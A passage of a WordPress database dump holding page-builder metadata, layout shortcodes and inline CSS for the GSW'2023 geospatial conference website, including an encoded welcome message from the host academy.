.text-icon.dt-icon-hover-off .soc-icon {\n  color: #ffffff;\n  background: none;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-1 {\n  grid-template-columns: 60px minmax(0,1fr);\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 {\n  grid-template-columns: minmax(0,1fr) 60px;\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 .text-icon {\n  margin-left: 0;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 {\n  grid-template-columns: 60px minmax(0,1fr);\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 .dt-text-title {\n  margin-left: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title a {\n  color: #eeee22;\n  background: none;\n  font-weight: bold;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title {\n  margin-bottom: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-desc {\n  margin-bottom: 0px;\n}\n\";}'),
(19744,3063,'_elementor_edit_mode','builder'),
(19745,3063,'_elementor_template_type','wp-page'),
(19746,3063,'_elementor_version','3.7.8'),
(19747,3063,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(19748,3063,'_elementor_page_assets','a:0:{}'),
(19749,3063,'_dt_page_overrides_right_margin',''),
(19750,3063,'_dt_page_overrides_left_margin',''),
(19751,3063,'_dt_mobile_page_padding_right',''),
(19752,3063,'_dt_mobile_page_padding_left',''),
(19753,3063,'_dt_microsite_primary_menu',''),
(19754,3063,'_dt_microsite_split_left_menu',''),
(19755,3063,'_dt_microsite_split_right_menu',''),
(19756,3063,'_dt_microsite_mobile_menu',''),
(19757,3063,'_elementor_page_settings','a:15:{s:19:\"the7_document_title\";s:9:\"slideshow\";s:41:\"the7_document_slideshow_revolution_slider\";s:28:\"the7-software-company-slider\";s:42:\"the7_document_disabled_header_color_scheme\";s:5:\"light\";s:41:\"the7_document__background_below_slideshow\";s:8:\"disabled\";s:39:\"the7_document_fancy_header_color_scheme\";s:5:\"light\";s:30:\"the7_document_sidebar_position\";s:8:\"disabled\";s:28:\"the7_document_show_footer_wa\";s:1:\"0\";s:25:\"the7_document_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:27:\"the7_document_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:28:\"the7_document_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:26:\"the7_document_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:32:\"the7_document_mobile_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:34:\"the7_document_mobile_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:35:\"the7_document_mobile_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:33:\"the7_document_mobile_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),
(19758,3063,'_dt_header_show','1'),
(19759,3063,'_dt_header_layer_show_bg_and_paddings',''),
(19760,3063,'_elementor_css','a:7:{s:4:\"time\";i:1665148472;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),
(19761,3063,'_dp_original','2167'),
(19762,3063,'_edit_last','4'),
(19764,3064,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19765,3063,'_edit_lock','1687707645:4'),
(19774,2082,'_wp_old_date','2022-10-26'),
(19775,2083,'_wp_old_date','2022-10-26'),
(19776,2346,'_wp_old_date','2022-10-26'),
(19777,2348,'_wp_old_date','2022-10-26'),
(19778,2349,'_wp_old_date','2022-10-26'),
(19779,2350,'_wp_old_date','2022-10-26'),
(19780,2351,'_wp_old_date','2022-10-26'),
(19781,2904,'_wp_old_date','2022-10-26'),
(19782,2084,'_wp_old_date','2022-10-26'),
(19783,2352,'_wp_old_date','2022-10-26'),
(19784,2281,'_wp_old_date','2022-10-26'),
(19785,2353,'_wp_old_date','2022-10-26'),
(19786,2354,'_wp_old_date','2022-10-26'),
(19787,2355,'_wp_old_date','2022-10-26'),
(19788,2282,'_wp_old_date','2022-10-26'),
(19789,2283,'_wp_old_date','2022-10-26'),
(19790,2284,'_wp_old_date','2022-10-26'),
(19791,2921,'_wp_old_date','2022-10-26'),
(19792,2285,'_wp_old_date','2022-10-26'),
(19793,2356,'_wp_old_date','2022-10-26'),
(19794,2357,'_wp_old_date','2022-10-26'),
(19795,2359,'_wp_old_date','2022-10-26'),
(19796,2358,'_wp_old_date','2022-10-26'),
(19797,2286,'_wp_old_date','2022-10-26'),
(19801,3066,'_wp_page_template','default'),
(19802,3066,'_wpb_vc_js_status','false'),
(19803,3066,'_dt_sidebar_position','disabled'),
(19804,3066,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19805,3066,'_dt_sidebar_hide_on_mobile','0'),
(19806,3066,'_dt_footer_show','0'),
(19807,3066,'_dt_footer_widgetarea_id','sidebar_2'),
(19808,3066,'_dt_footer_hide_on_mobile','0'),
(19809,3066,'_dt_header_title','fancy'),
(19810,3066,'_dt_header_background','normal'),
(19811,3066,'_dt_header_background_below_slideshow','disabled'),
(19812,3066,'_dt_header_transparent_bg_color','#000000'),
(19813,3066,'_dt_header_transparent_bg_opacity','50'),
(19814,3066,'_dt_header_transparent_bg_color_scheme','light'),
(19815,3066,'_dt_header_disabled_background','normal'),
(19816,3066,'_dt_header_disabled_transparent_bg_color','#000000'),
(19817,3066,'_dt_header_disabled_transparent_bg_opacity','50'),
(19818,3066,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19819,3066,'_dt_header_transparent_top_bar_bg_color',''),
(19820,3066,'_dt_header_transparent_top_bar_bg_opacity','0'),
(19821,3066,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(19822,3066,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(19823,3066,'_dt_page_overrides_top_margin',''),
(19824,3066,'_dt_page_overrides_bottom_margin',''),
(19825,3066,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 